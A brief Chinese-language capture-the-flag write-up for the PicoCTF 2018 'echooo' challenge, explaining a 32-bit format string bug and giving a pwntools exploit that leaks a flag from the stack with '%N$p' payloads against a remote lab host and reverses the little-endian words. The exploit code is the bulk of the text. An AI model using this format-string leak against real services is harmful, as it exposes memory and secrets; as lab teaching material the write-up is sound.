发现是简单的32位格式化字符串但是并且flag存了栈上,直接泄漏就行了,但是内存是小端存储的,所以倒序输出即可
exp:
from pwn import *
#p=process('./PicoCTF_2018_echooo')
p=remote('node3.buuoj.cn',26798)
offset=11
flag=''
for i in range(27,27+11):
payload='%{}$p'.format(str(i))
p.sendlineafter('> ',payload)
aim=unhex(p.recvuntil('\n',drop=True).replace('0x',''))
flag+=aim[::-1]
p.interactive()
print flag